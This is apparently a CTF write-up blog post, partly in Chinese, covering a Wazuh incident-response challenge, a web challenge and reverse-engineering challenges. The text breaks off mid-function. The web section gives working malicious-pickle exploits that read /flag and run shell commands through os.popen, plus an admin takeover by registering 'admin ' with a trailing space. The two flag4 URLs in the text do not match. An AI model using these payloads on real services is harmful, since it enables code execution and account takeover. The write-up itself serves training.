2025-9-13 13:10:0 Author: www.cnblogs.com

Incident Response

Incident response: SIEM

Baidu Netdisk:

Files shared via Baidu Netdisk: siem-加密.rar

Link: https://pan.baidu.com/s/1wtfdSY2hThOAzVRGr9jwcg Extraction code: e86t

Archive password: x2p1nsWFG4KfXp5BXegb

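The challenge description changed once during the competition. The versions were:

Initial version:

An enterprise intranet has been compromised. Analyze what happened and submit the correct flag.

flag1: What is the attacker's IP address?

flag2: How many terminal sessions logged in successfully during the attack window?

flag3: What backdoor system user did the attacker leave behind?

flag4: Submit the full URL the attacker tried to request from the command line.

flag5: Submit the event ID that Wazuh recorded when the attacker ran a pass-the-hash attack against the domain.

flag6: Submit the tool the attacker used to attack the domain.

flag7: Submit the name of the file the attacker deleted from the DC's desktop.

Flag format: flag{md5(flag1-flag2-flag3-...-flag6-flag7)}

VM login (user/password): wazuh-user/wazuh

Web address: http://IP:80, username/password admin/admin

First change

I forgot to save the changed version, but flag6 and flag7 changed: the flag6 tool name must be submitted without a file extension, and the flag7 deleted file name must include its extension.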

flag1:攻击者的ip是什么



先开机,使用给出的密码登录系统,使用sudo su切换到root用户,查看当前虚拟机的IP地址:

测试发现80端口没有开放,实际需要访问https://IP:443才能打开web页面









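flag2: How many terminal sessions logged in successfully during the attack window?

The screenshots above already show the answer: 13.

flag3: What backdoor system user did the attacker leave behind?

The logs show a user being added to the system.

Inspecting that event gives the username hacker.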



flag4:提交攻击者试图用命令行请求网页的完整url地址





命令行请求网页一般是使用curl,直接搜索curl,可以看到有两个日志,但是另外一个日志是本机发起的,所以可以确定完整的url是由黑客攻击发起的那个。https://192.168.41.146/.back.php?pass=id
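The same curl search can also be scripted outside the dashboard. A minimal sketch, assuming the alerts are available as JSON lines (the format of Wazuh's alerts.json) with the raw command line in a `full_log` field and the agent under `agent.name`; those field names are assumptions, not something taken from this challenge:

```python
import json
import re
from typing import Iterable, Iterator, Tuple

# Stop at whitespace or quotes so "curl 'http://...'" yields a clean URL
URL_RE = re.compile(r"https?://[^\s'\"]+")


def curl_urls(alert_lines: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Yield (agent name, URL) for every alert whose full_log mentions curl."""
    for line in alert_lines:
        line = line.strip()
        if not line:
            continue
        alert = json.loads(line)
        log = alert.get("full_log", "")
        if "curl" not in log:
            continue
        agent = alert.get("agent", {}).get("name", "?")
        for url in URL_RE.findall(log):
            yield agent, url
```

On a default manager install the JSON alerts usually live in /var/ossec/logs/alerts/alerts.json, so passing an open handle to that file into `curl_urls` lists the candidate URLs per agent; the request issued by the local machine still has to be ruled out by hand, as above.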

flag5:提交wazuh记录攻击者针对域进行哈希传递攻击时被记录的事件ID





查看pc日志,筛选Possible Pass the hash attack
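The value submitted for flag5 in the result below (1734511987.34749419) appears to have the `<epoch seconds>.<offset>` shape of a Wazuh alert ID rather than a Windows event number. A sketch of the same filter over JSON-lines alerts that reports both, assuming the field names `id`, `rule.description` and `data.win.system.eventID` (assumptions about the alert layout, not confirmed by the writeup):

```python
import json
from typing import Iterable, Iterator


def alerts_matching(alert_lines: Iterable[str], description: str) -> Iterator[dict]:
    """Yield a short summary of every alert whose rule.description contains `description`."""
    needle = description.lower()
    for line in alert_lines:
        line = line.strip()
        if not line:
            continue
        alert = json.loads(line)
        rule = alert.get("rule", {})
        if needle not in rule.get("description", "").lower():
            continue
        win_system = alert.get("data", {}).get("win", {}).get("system", {})
        yield {
            "alert_id": alert.get("id"),                   # Wazuh alert ID
            "timestamp": alert.get("timestamp"),
            "agent": alert.get("agent", {}).get("name"),
            "rule_id": rule.get("id"),
            "windows_event_id": win_system.get("eventID"),  # Windows event ID, if present
        }
```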

flag6:提交攻击者对域攻击所使用的工具



查到有mimikatz创建



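flag7: Submit the name of the file the attacker deleted from the DC's desktop.

Open the DC's logs directly and filter for file-deletion events.

The name of the file deleted from the desktop is visible right away.

Result

192.168.41.143-13-hacker-http://192.168.41.136/.back.php?pass=id-1734511987.34749419-mimikatz-ossec.conf

flag{3bfc26f5d9f932ccf73f356019585edf}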
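The final flag is just an MD5 over the hyphen-joined answers. A small sketch using the answers from the result line above; because the hash changes with any single character (URL scheme, IP, file extension), each answer has to match byte for byte what the checker expects:

```python
import hashlib


def make_flag(answers: list) -> str:
    """Join the answers with '-' and wrap the MD5 hex digest in flag{...}."""
    joined = "-".join(answers)
    return "flag{" + hashlib.md5(joined.encode("utf-8")).hexdigest() + "}"


answers = [
    "192.168.41.143",                           # flag1
    "13",                                       # flag2
    "hacker",                                   # flag3
    "http://192.168.41.136/.back.php?pass=id",  # flag4
    "1734511987.34749419",                      # flag5
    "mimikatz",                                 # flag6
    "ossec.conf",                               # flag7
]
print(make_flag(answers))
```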

勒索软件入侵响应

web

forge



题目考点



• 考点1:unicode替代字符,绕过admin登录

• 考点2:文件上传

解题思路

看到登录框看看怎么绕过,注册发现只能用admin登录,但是不能用admin当做用户名,所以想到用unicode替换admin为admin去注册

但是想到只能用admin用户名登录,但是用密码用注册时设置的密码,顺利登录界面
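The writeup does not say which look-alike character was used or how the server compares usernames. One common mechanism, shown here purely as an assumption, is Unicode NFKC normalization, which folds fullwidth letters back to plain ASCII after the registration check has already passed:

```python
import unicodedata


def canonical(name: str) -> str:
    """Hypothetical server-side canonicalization: NFKC-normalize a username."""
    return unicodedata.normalize("NFKC", name)


# Fullwidth "ａｄｍｉｎ" (U+FF41 U+FF44 U+FF4D U+FF49 U+FF4E): a hypothetical look-alike
lookalike = "\uff41\uff44\uff4d\uff49\uff4e"
print(lookalike == "admin")   # False: slips past a naive "username == 'admin'" check
print(canonical(lookalike))   # admin
```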

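Open "upload model" to see the accepted file type; a sample file is provided next to it.

It is a .pkl file, so we can have an AI write code that generates a malicious file and then upload it.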



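exp:

```python
import pickle

# Define the CHIKAWA class; its initializer carries no extra logic
class CHIKAWA:
    def __init__(self):
        pass

# 1. Create a CHIKAWA instance
chikawa_instance = CHIKAWA()

# 2. Attach the expected attributes and their values
chikawa_instance.model_name = "JKL0x3e"
# Hand-written protocol-0 pickle that evaluates pathlib.Path.read_text(PosixPath('/flag')).
# The \u002f\u0066... sequences stay as literal backslash escapes in the bytes; the pickle
# V opcode decodes them (raw-unicode-escape), so the literal string "/flag" never appears.
chikawa_instance.data = b'c__builtin__\ngetattr\np0\n(cpathlib\nPath\np1\nVread_text\np2\ntp3\nRp4\n(cpathlib\nPosixPath\np5\n(V\\u002f\\u0066\\u006c\\u0061\\u0067\np6\ntp7\nRp8\ntp9\nRp10\n.'

# 3. Serialize the instance
serialized_data = pickle.dumps(chikawa_instance)

# 4. Write the serialized data to test.pkl
with open("test.pkl", "wb") as file:
    file.write(serialized_data)
```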

Running it produces test.pkl.

Upload the file to the site; the payload reads /flag, which yields the flag.

FLAG

flag{va4WdBiEqFe6QkaJ5tZLmrxgkIygf8Kd}

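Alternatively:

The site says only admin can log in, and trying to register admin says a bypass is needed. Testing shows that registering "admin " (with a trailing space) overwrites admin's password. After logging in, the backend accepts .pkl uploads. The sample file turns out to be `pickle`-serialized data and some filtering is in place, but os.popen is not blocked, so the following exploit works directly: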

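```python
import pickle

import requests

url = "http://web-e02460973d.challenge.longjiancup.cn:80/"
req = requests.Session()


def upload(payload):
    """Upload a .pkl file and return the model ID taken from its /execute/<id> form."""
    u = url + "upload"
    r = req.post(u, files={"file": ("123.pkl", payload)})
    return r.text.split('<strong>123.pkl</strong>')[1].split('<form action="/execute/')[1].split('"')[0]


def exec_(model_id):
    """Ask the server to load and run the uploaded model, then print the response."""
    u = url + "execute/" + model_id
    print(req.post(u).text)


class CHIKAWA:
    def __init__(self, payload):
        self.model_name = "123"
        self.data = payload.encode()
        self.parameters = []


# Register "admin " (trailing space) to overwrite admin's password, then log in as admin
req.post(url + "register", data={"username": "admin ", "password": "admin"})
req.post(url + "login", data={"username": "admin", "password": "admin"})

# Hand-written protocol-0 pickle: os.popen('touch "/tmp/`/bin/ca? /?lag`"').
# The globs /bin/ca? and /?lag are meant to expand to /bin/cat and /flag; the command
# substitution turns the flag's contents into a file name under /tmp.
payload = """cos
popen
(Vtouch "/tmp/`/bin/ca? /?lag`"
tR."""
exec_(upload(pickle.dumps(CHIKAWA(payload))))

# os.listdir('/tmp/') then returns that file name, i.e. the flag
payload = """cos
listdir
(V/tmp/
tR."""
exec_(upload(pickle.dumps(CHIKAWA(payload))))
```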
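Both payloads above are hand-written protocol-0 pickles rather than `pickle.dumps` output. A minimal, harmless sketch of how those opcodes execute, with `builtins.len` and `builtins.str` substituted for the real targets (the substitution is ours, for illustration only):

```python
import pickle

# Protocol-0 opcodes used by the hand-written payloads:
#   c<module>\n<name>\n  GLOBAL: push module.name
#   (                    MARK
#   V<text>\n            UNICODE: push a str (raw-unicode-escape decoded)
#   t                    TUPLE: pack everything since MARK into a tuple
#   R                    REDUCE: pop args tuple and callable, push callable(*args)
#   .                    STOP: return the top of the stack
CALL_LEN = b"cbuiltins\nlen\n(Vhello\ntR."
# \u escapes inside V are decoded, so "/flag" never appears literally in the bytes
CALL_STR = b"cbuiltins\nstr\n(V\\u002f\\u0066lag\ntR."

print(pickle.loads(CALL_LEN))   # 5
print(pickle.loads(CALL_STR))   # /flag
```

Swapping `builtins\nlen` for `os\npopen` is all it takes to turn this into command execution, which is why loading untrusted pickles is unsafe.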

re

Lesscommon

Key points

• Point 1

• Point 2

Approach

Opening the main function in IDA leads straight to the encryption routine:

```c
__int64 __fastcall sub_140001600(__int64 a1, __int64 a2, __int64 a3)
{
  __int64 v3; // rax
  __int64 v4; // rdx
  __int64 v5; // r8
  __int64 v6; // rax
  __int64 v8; // [rsp+20h] [rbp-48h]
  char v10; // [rsp+37h] [rbp-31h]
  __int64 v11; // [rsp+50h] [rbp-18h] BYREF
  __int64 v12; // [rsp+58h] [rbp-10h] BYREF

  v8 = a2;
  LOBYTE(a2) = v10;
  sub_140002D00(a1, a2, a3);
  v12 = sub_140005C80(v8);
  v11 = sub_140003D70(v8);
  v3 = sub_140005C90(v8);
  v6 = sub_1400015F0(v3, v4, v5);
  sub_140005AE0(a1, v6, &v11, &v12);
  return a1;
}
```

```c
_DWORD *__fastcall sub_1400020D0(_DWORD *a1, __int64 n12, __int64 a3)
{
  _DWORD *v4; // [rsp+20h] [rbp-28h]
  int n12_1; // [rsp+38h] [rbp-10h]
  char v7; // [rsp+3Fh] [rbp-9h] BYREF

  n12_1 = n12;
  *a1 = n12;
  v4 = a1 + 2;
  sub_1400015F0(&v7, n12, a3);
  sub_140002CB0(
    v4,
    ((n12_1 + 1) & 0xFFFFFFFD) * (~((_BYTE)n12_1 + 1) & 2) + (((_BYTE)n12_1 + 1) & 2) * ((n12_1 + 1) | 2),
    &v7);
  return a1;
}
```

```c
// The function seems has been flattened
__int64 __fastcall sub_140002170(__int64 a1, __int64 a2)
{
  __int64 v2; // rdx
  __int64 v3; // r8
  int v4; // eax
  _DWORD *v5; // rax
  _DWORD *v6; // rax
  __int64 v7; // rdx
  int v9; // [rsp+20h] [rbp-C8h]
  int n3_4; // [rsp+28h] [rbp-C0h]
  int v11; // [rsp+2Ch] [rbp-BCh]
  int v12; // [rsp+3Ch] [rbp-ACh]
  int v13; // [rsp+40h] [rbp-A8h]
  int k; // [rsp+60h] [rbp-88h]
  int v16; // [rsp+64h] [rbp-84h]
  int n3; // [rsp+68h] [rbp-80h]
  int v18; // [rsp+6Ch] [rbp-7Ch]
  unsigned int v19; // [rsp+70h] [rbp-78h]
  unsigned int v20; // [rsp+74h] [rbp-74h]
  unsigned __int64 j; // [rsp+78h] [rbp-70h]
  signed int i; // [rsp+84h] [rbp-64h]
  _BYTE v24[12]; // [rsp+B3h] [rbp-35h] BYREF
  char v25; // [rsp+BFh] [rbp-29h] BYREF
  _BYTE v26[28]; // [rsp+C0h] [rbp-28h] BYREF
  int v27; // [rsp+DCh] [rbp-Ch] BYREF

  v27 = (unsigned __int64)(sub_140002070(a2) + 3) >> 2;
  if ( !v27 )
    v27 = 1;
  sub_1400015F0(&v25, v2, v3);
  *(_DWORD *)&v24[5] = 0;
  sub_1400040F0(v26, v27, &v24[5], &v25);
  v4 = sub_140002070(a2);
  for ( i = 2 * (v4 & 0xFFFFFFFE) - (v4 ^ 1); i >= 0; --i )
  {
    v12 = *(_DWORD *)sub_140004140(v26, i / 4) << 8;
    v13 = *(unsigned __int8 *)sub_140004170(a2, i) + v12;
    *(_DWORD *)sub_140004140(v26, i / 4) = v13;
  }
  *(_DWORD *)sub_140004140(a1 + 8, 0) = 1766649740;
  for ( j = 1; j < sub_1400041A0(a1 + 8); ++j )
  {
    v11 = *(_DWORD *)sub_140004140(a1 + 8, j - 1) + 1422508807;
    *(_DWORD *)sub_140004140(a1 + 8, j) = v11;
  }
  v20 = 0;
  v19 = 0;
  v18 = 0;
  n3 = 0;
  *(_DWORD *)&v24[1] = sub_1400041A0(a1 + 8);
  v16 = 3 * *(_DWORD *)sub_1400041E0(&v24[1], &v27);
  for ( k = 0; k < v16; ++k )
  {
    v5 = (_DWORD *)sub_140004140(a1 + 8, v20);
    v9 = k ^ sub_140004300(v24, (unsigned int)(n3 + v18 + *v5), 3);
    *(_DWORD *)sub_140004140(a1 + 8, v20) = v9;
    v18 = v9;
    v6 = (_DWORD *)sub_140004140(v26, v19);
    n3_4 = sub_140004300(v24, (n3 | (v18 + *v6)) + (n3 & (unsigned int)(v18 + *v6)), (unsigned int)(v9 + n3));
    *(_DWORD *)sub_140004140(v26, v19) = n3_4;
    n3 = n3_4;
    v20 = (v20 + 1) % *(_DWORD *)&v24[1];
    v7 = (v19 + 1) % v27;
    v19 = v7;
  }
  return sub_1400043C0(v26);
}
```

```c
__int64 __fastcall sub_140004300(__int64 a1, unsigned int a2, __int64 n3)
{
  int v3; // r11d
  unsigned int v4; // r10d

  v3 = a2 << (n3 & 0x1F);
  v4 = a2 >> ((~(n3 & 0x1F) & (~(_BYTE)n3 | 0xE0)) + 33);
  return ~(~v4 | ~v3) | v4 ^ 0x72EF6B6C ^ v3 ^ 0x72EF6B6C;
}
```

```c
// The function seems has been flattened
__int64 __fastcall sub_1400027A0(__int64 a1, __int64 a2, __int64 a3)
{
  __int64 v3; // rax
  __int64 v4; // rax
  __int64 v6; // [rsp+28h] [rbp-70h]
  unsigned __int64 i; // [rsp+60h] [rbp-38h]
  char v12; // [rsp+8Fh] [rbp-9h] BYREF

  sub_1400015F0(&v12, a2, a3);
  v3 = sub_140002070(a3);
  sub_1400049C0(a2, v3, &v12);
  for ( i = 0; i < sub_140002070(a3); i += 8LL )
  {
    v6 = sub_140004170(a2, i);
    v4 = sub_140004170(a3, i);
    sub_140004A10(a1, v4, v6);
  }
  return a2;
}
```

```c
// The function seems has been flattened
__int64 __fastcall sub_14000CF60(__int64 a1, __int64 a2)
{
  if ( *(_QWORD *)(a1 + 8) == *(_QWORD *)(a1 + 16) )
    return sub_14000D150(a1, *(_QWORD *)(a1 + 8), a2);
  else
    return sub_14000D0D0(a1, a2);
}
```

```c
// The function seems has been flattened
__int64 __fastcall sub_140004A10(unsigned int *a1, __int64 a2, __int64 a3)
{
  __int64 result; // rax
  _DWORD *v4; // rax
  int v5; // eax
  _DWORD *v6; // rax
  int n4_1; // [rsp+54h] [rbp-44h]
  int n4; // [rsp+58h] [rbp-40h]
  unsigned int i; // [rsp+5Ch] [rbp-3Ch]
  int n7; // [rsp+60h] [rbp-38h]
  int n3; // [rsp+64h] [rbp-34h]
  int v13; // [rsp+68h] [rbp-30h]
  unsigned int v14; // [rsp+68h] [rbp-30h]
  int v15; // [rsp+6Ch] [rbp-2Ch]
  unsigned int v16; // [rsp+6Ch] [rbp-2Ch]
  char v18; // [rsp+8Fh] [rbp-9h] BYREF

  v15 = 0;
  v13 = 0;
  for ( n3 = 3; n3 >= 0; --n3 )
    v15 = *(unsigned __int8 *)(a2 + n3) | (v15 << 8);
  for ( n7 = 7; n7 >= 4; --n7 )
    v13 = (*(unsigned __int8 *)(a2 + n7) ^ (v13 << 8)) + (v13 << 8) - (~*(unsigned __int8 *)(a2 + n7) & (v13 << 8));
  v16 = v15 + *(_DWORD *)sub_140004140(a1 + 2, 0);
  v14 = *(_DWORD *)sub_140004140(a1 + 2, 1) + v13;
  for ( i = 1; i <= *a1; ++i )
  {
    v4 = (_DWORD *)sub_140004140(a1 + 2, 2 * i);
    v5 = sub_140005730(&v18, *v4 + v16, v14);
    v16 = v14 + v5 - 2 * (v14 & v5);
    v6 = (_DWORD *)sub_140004140(a1 + 2, 2 * i + 1);
    LODWORD(result) = sub_140005730(&v18, *v6 + v14, v16);
    v14 = v16 + result - 2 * (v16 & result);
  }
  for ( n4 = 0; n4 < 4; ++n4 )
    *(_BYTE *)(a3 + n4) = v16 >> (8 * n4);
  for ( n4_1 = 0; n4_1 < 4; n4_1 = (n4_1 | 1) + (n4_1 & 1) )
    *(_BYTE *)(a3 + n4_1 + 4) = v14 >> (8 * n4_1);
  return result;
}
```
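The decompiled functions are full of mixed boolean-arithmetic (MBA) rewrites of simple operations. A quick randomized check (a sanity sketch, not a proof) that the expressions above reduce to the plain operations the analysis below relies on; in particular, the right-shift count in sub_140004300 works out to 32 - (n3 & 0x1F) and its return value to v4 | v3, which makes it a 32-bit rotate-left:

```python
import random

MASK32 = 0xFFFFFFFF


def check_mba_identities(trials: int = 10_000, seed: int = 0) -> bool:
    """Randomly test the MBA rewrites seen in the decompiled functions above."""
    rng = random.Random(seed)
    k = 0x72EF6B6C  # the constant that cancels itself in sub_140004300
    for _ in range(trials):
        x, y, n = rng.getrandbits(32), rng.getrandbits(32), rng.getrandbits(32)
        # sub_140004300 shift count: (~(n & 31) & (~(BYTE)n | 0xE0)) + 33 == 32 - (n & 31)
        assert (~(n & 31) & (~(n & 0xFF) | 0xE0)) + 33 == 32 - (n & 31)
        # sub_140004300 result: ~(~v4 | ~v3) | (v4 ^ K ^ v3 ^ K) == v4 | v3
        assert ((~(~x | ~y)) | (x ^ k ^ y ^ k)) & MASK32 == (x | y)
        # sub_140002170 key schedule: (a | b) + (a & b) == a + b
        assert ((x | y) + (x & y)) & MASK32 == (x + y) & MASK32
        # sub_140004A10 rounds: a + b - 2*(a & b) == a ^ b
        assert (x + y - 2 * (x & y)) & MASK32 == (x ^ y)
        # sub_140004A10 byte packing: (b ^ s) + s - (~b & s) == b | s
        assert ((x ^ y) + y - (~x & y)) & MASK32 == (x | y)
        # sub_140002170 loop start: 2*(v4 & ~1) - (v4 ^ 1) == v4 - 1
        assert (2 * (n & 0xFFFFFFFE) - (n ^ 1)) & MASK32 == (n - 1) & MASK32
        # sub_140004A10 loop step: (i | 1) + (i & 1) == i + 1
        assert ((n | 1) + (n & 1)) & MASK32 == (n + 1) & MASK32
        # sub_1400020D0 table size: the MBA expression == 2 * (n12 + 1)
        m = (n + 1) & MASK32
        size = (m & 0xFFFFFFFD) * (~m & 2) + (m & 2) * (m | 2)
        assert size & MASK32 == (2 * m) & MASK32
    return True
```

With n12 = 12 the last identity gives a table of 26 words, i.e. 2 * (R + 1) round keys for R = 12.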

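From these functions we can conclude:

sub_140001600 → obtains key = v27 (16 bytes) and the target ciphertext = &unk_14002D420 (48 bytes);

sub_1400020D0/2170/004300 → an RC5-variant key expansion with R = 12, S[0] = 0x694CEF8C, and step 0x54C9C307;

sub_1400027A0/004A10 → block-by-block encryption/decryption in ECB mode;

sub_1400020A0 → PKCS#7 padding/unpadding with an 8-byte block;

Statically decrypt the 48 bytes → strip the padding → recover the plaintext/flag;

Or, in the forward direction: the input is encrypted through the same pipeline and must match v21 to pass.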
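To sanity-check the recovered round function, here is a sketch of the forward direction next to its inverse. It assumes sub_140005730 (not shown above) rotates its second argument left by its third, the same assumption the decryption scripts make; a passing round trip only shows the two directions are consistent with each other, not that they match the binary:

```python
MASK32 = 0xFFFFFFFF
R = 12                            # rounds, as passed to sub_1400020D0
PW, QW = 0x694CEF8C, 0x54C9C307   # S[0] and the step, from sub_140002170


def rol32(x: int, n: int) -> int:
    n &= 31
    return ((x << n) | (x >> (32 - n))) & MASK32


def ror32(x: int, n: int) -> int:
    n &= 31
    return ((x >> n) | (x << (32 - n))) & MASK32


def key_expand(key: bytes) -> list:
    t = 2 * (R + 1)
    S = [(PW + i * QW) & MASK32 for i in range(t)]
    c = max(1, (len(key) + 3) // 4)
    L = [0] * c
    for i in range(len(key) - 1, -1, -1):           # little-endian key words, as in RC5
        L[i // 4] = ((L[i // 4] << 8) + key[i]) & MASK32
    A = B = i = j = 0
    for k in range(3 * max(t, c)):
        A = S[i] = k ^ rol32((S[i] + A + B) & MASK32, 3)  # variant: XOR with the counter
        B = L[j] = rol32((L[j] + A + B) & MASK32, A + B)
        i, j = (i + 1) % t, (j + 1) % c
    return S


def encrypt_block(S: list, blk: bytes) -> bytes:
    A = (int.from_bytes(blk[:4], "little") + S[0]) & MASK32
    B = (int.from_bytes(blk[4:], "little") + S[1]) & MASK32
    for i in range(1, R + 1):
        A = B ^ rol32((S[2 * i] + A) & MASK32, B)       # v16 = v14 ^ ROL(S[2i] + v16, v14)
        B = A ^ rol32((S[2 * i + 1] + B) & MASK32, A)   # v14 = v16 ^ ROL(S[2i+1] + v14, v16)
    return A.to_bytes(4, "little") + B.to_bytes(4, "little")


def decrypt_block(S: list, blk: bytes) -> bytes:
    A = int.from_bytes(blk[:4], "little")
    B = int.from_bytes(blk[4:], "little")
    for i in range(R, 0, -1):
        B = (ror32(B ^ A, A) - S[2 * i + 1]) & MASK32
        A = (ror32(A ^ B, B) - S[2 * i]) & MASK32
    A, B = (A - S[0]) & MASK32, (B - S[1]) & MASK32
    return A.to_bytes(4, "little") + B.to_bytes(4, "little")


def pad(data: bytes, bs: int = 8) -> bytes:
    p = bs - len(data) % bs
    return data + bytes([p]) * p


def unpad(data: bytes) -> bytes:
    return data[:-data[-1]]


def ecb(fn, S: list, data: bytes) -> bytes:
    return b"".join(fn(S, data[i:i + 8]) for i in range(0, len(data), 8))
```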

A short script is all that is needed.

FLAG

```python
# -*- coding: utf-8 -*-
# Statically decrypt .rdata:&unk_14002D420 (48 bytes)
# Algorithm: custom RC5-32/12/ECB variant
#   R = 12, S[0] = 0x694CEF8C, step +0x54C9C307
#   key = v27 = 01 23 45 67 89 AB CD EF FE DC BA 98 76 54 32 10
# Round function:
#   v16 += S[0], v14 += S[1]
#   for i = 1..R:
#       u = ROL(S[2*i] + v16, v14); v16 = v14 ^ u
#       w = ROL(S[2*i+1] + v14, v16); v14 = v16 ^ w
# Decryption runs the rounds in reverse order, then strips PKCS#7 padding (block size 8)

PW = 0x694CEF8C
QW = 0x54C9C307
R = 12
MASK32 = 0xFFFFFFFF

KEY_BYTES = bytes([
    0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF,
    0xFE, 0xDC, 0xBA, 0x98, 0x76, 0x54, 0x32, 0x10,
])

CIPH_HEX = (
    "4c6fabf31378e2f6869d1c99de85cc10"
    "e828ee0592214b344328173c565b7351"
    "9f8a1d0f97342c56429f6948a3d58af5"
)


def rol32(x, n):
    n &= 31
    x &= MASK32
    return ((x << n) | (x >> (32 - n))) & MASK32


def ror32(x, n):
    n &= 31
    x &= MASK32
    return ((x >> n) | (x << (32 - n))) & MASK32


def load_L_from_key(k: bytes):
    # Build the key words from the last byte backwards (little-endian words),
    # matching the i-- loop in sub_140002170
    c = max(1, (len(k) + 3) // 4)
    L = [0] * c
    for i in range(len(k) - 1, -1, -1):
        j = i // 4
        L[j] = ((L[j] << 8) + k[i]) & MASK32
    return L


def key_expand(k: bytes):
    t = 2 * (R + 1)
    S = [0] * t
    S[0] = PW
    for i in range(1, t):
        S[i] = (S[i - 1] + QW) & MASK32
    L = load_L_from_key(k)
    c = len(L)
    A = B = 0
    i = j = 0
    # 3*max(t, c) mixing passes: S[i] = k ^ ROL(S[i]+A+B, 3), L[j] = ROL(L[j]+A+B, A+B)
    for kcnt in range(3 * max(t, c)):
        S[i] = (kcnt ^ rol32((S[i] + A + B) & MASK32, 3)) & MASK32
        A = S[i]
        val = (L[j] + A + B) & MASK32
        sh = (A + B) & 31
        L[j] = rol32(val, sh)
        B = L[j]
        i = (i + 1) % t
        j = (j + 1) % c
    return S


def decrypt_block(S, cblk: bytes) -> bytes:
    # Both ciphertext words are stored little-endian
    v16 = int.from_bytes(cblk[0:4], 'little')
    v14 = int.from_bytes(cblk[4:8], 'little')
    for i in range(R, 0, -1):
        tmp = v14 ^ v16
        v14 = (ror32(tmp, v16 & 31) - S[2 * i + 1]) & MASK32
        tmp = v16 ^ v14
        v16 = (ror32(tmp, v14 & 31) - S[2 * i]) & MASK32
    v16 = (v16 - S[0]) & MASK32
    v14 = (v14 - S[1]) & MASK32
    # Plaintext: both 4-byte halves little-endian (the inverse of how encryption reads them)
    return v16.to_bytes(4, 'little') + v14.to_bytes(4, 'little')


def unpad(data: bytes, bs=8):
    if not data or len(data) % bs:
        return None
    p = data[-1]
    if p == 0 or p > bs or data[-p:] != bytes([p]) * p:
        return None
    return data[:-p]


if __name__ == "__main__":
    S = key_expand(KEY_BYTES)
    c = bytes.fromhex(CIPH_HEX)
    pt = b''.join(decrypt_block(S, c[i:i + 8]) for i in range(0, len(c), 8))
    msg = unpad(pt, 8) or pt
    print(msg.decode('utf-8', errors='ignore'))
```

Alternatively:

```python
# -*- coding: utf-8 -*-
import struct


def rol32(x, n):
    n &= 0x1F
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def ror32(x, n):
    n &= 0x1F
    x &= 0xFFFFFFFF
    return ((x >> n) | (x << (32 - n))) & 0xFFFFFFFF


def u32(x):
    return x & 0xFFFFFFFF


def key_schedule(key_bytes: bytes, S_len: int):
    # Mirrors sub_140002170 in the disassembly: L is packed from the last byte backwards,
    # then S is initialized and mixed for 3*max(S_len, L_len) iterations
    L_len = (len(key_bytes) + 3) >> 2
    if L_len == 0:
        L_len = 1
    L = [0] * L_len
    for i in range(len(key_bytes) - 1, -1, -1):
        idx = i // 4
        L[idx] = u32((L[idx] << 8) + key_bytes[i])
    S = [0] * S_len
    S[0] = 1766649740          # 0x694CEF8C
    add_const = 1422508807     # 0x54C9C307
    for j in range(1, S_len):
        S[j] = u32(S[j - 1] + add_const)
    v15 = 0
    v16 = 0
    idxS = 0
    idxL = 0
    rounds = 3 * max(S_len, L_len)
    for k in range(rounds):
        v = S[idxS]
        v7 = u32(k ^ rol32(u32(v15 + v16 + v), 3))
        S[idxS] = v7
        v16 = v7
        v_l = L[idxL]
        v8 = u32(rol32(u32(v15 + v7 + v_l), (v7 + v15) & 0x1F))
        L[idxL] = v8
        v15 = v8
        idxS = (idxS + 1) % S_len
        idxL = (idxL + 1) % L_len
    return S


def decrypt_block(block8: bytes, S, rounds_count: int):
    v15 = struct.unpack('<I', block8[0:4])[0]
    v13 = struct.unpack('<I', block8[4:8])[0]
    for k in range(rounds_count, 0, -1):
        tmp = u32(v13 ^ v15)
        v13_in = u32(ror32(tmp, v15) - S[2 * k + 1])
        tmp2 = u32(v15 ^ v13_in)
        v15_in = u32(ror32(tmp2, v13_in) - S[2 * k])
        v13, v15 = v13_in, v15_in
    v14 = u32(v15 - S[0])
    v12 = u32(v13 - S[1])
    return struct.pack('<I', v14) + struct.pack('<I', v12)


def decrypt_buffer(cipherbytes: bytes, S, rounds_count: int):
    if len(cipherbytes) % 8 != 0:
        raise ValueError("cipher length must be multiple of 8")
    out = bytearray()
    for i in range(0, len(cipherbytes), 8):
        out += decrypt_block(cipherbytes[i:i + 8], S, rounds_count)
    # Strip PKCS#7-style padding
    if not out:
        return bytes(out)
    pad_len = out[-1]
    if 1 <= pad_len <= 8 and out.endswith(bytes([pad_len]) * pad_len):
        return bytes(out[:-pad_len])
    return bytes(out)


if __name__ == "__main__":
    key_bytes = struct.pack('<4I', 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    cipher_bytes = bytes([
        0x4C, 0x6F, 0xAB, 0xF3, 0x13, 0x78, 0xE2, 0xF6, 0x86, 0x9D, 0x1C, 0x99, 0xDE, 0x85, 0xCC, 0x10,
        0xE8, 0x28, 0xEE, 0x05, 0x92, 0x21, 0x4B, 0x34, 0x43, 0x28, 0x17, 0x3C, 0x56, 0x5B, 0x73, 0x51,
        0x9F, 0x8A, 0x1D, 0x0F, 0x97, 0x34, 0x2C, 0x56, 0x42, 0x9F, 0x69, 0x48, 0xA3, 0xD5, 0x8A, 0xF5,
    ])
    rounds_count = 12
    S_len = 2 + 2 * rounds_count  # S must cover every index the rounds access
    S = key_schedule(key_bytes, S_len)
    plain = decrypt_buffer(cipher_bytes, S, rounds_count)
    print("decrypted (hex):", plain.hex())
    print("decrypted (utf-8):", plain.decode('utf-8', errors='replace'))
```

RC5 symmetric encryption algorithm (CSDN blog)

RC6 encryption/decryption algorithm implementation in C (CSDN blog)

Prover

Key points

• z3

• Recognizing bit-manipulation idioms

Approach

```c
__int64 __fastcall sub_2FE0(unsigned __int8 a1, char a2)
{
  if ( (a2 & 7) != 0 )
    return (unsigned __int8)(((int)a1 >> (8 - (a2 & 7))) | (a1 << (a2 & 7)));
  else
    return a1;
}

unsigned __int64 __fastcall sub_31B0(__int64 a1)
{
  unsigned __int8 *v1; // rax
  unsigned __int64 v3; // [rsp+8h] [rbp-28h]
  unsigned __int64 i; // [rsp+10h] [rbp-20h]
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]

  v5 = 0x243F6A8885A308D3LL;
  for ( i = 0; i < sub_3650(a1); ++i )
  {
    v1 = (unsigned __int8 *)sub_3B00(a1, i);
    v5 = sub_32E0(0x9E3779B185EBCA87LL * (v5 ^ ((unsigned __int64)*v1 << (8 * ((unsigned __int8)i & 7u)))), 13);
  }
  v3 = 0x94D049BB133111EBLL
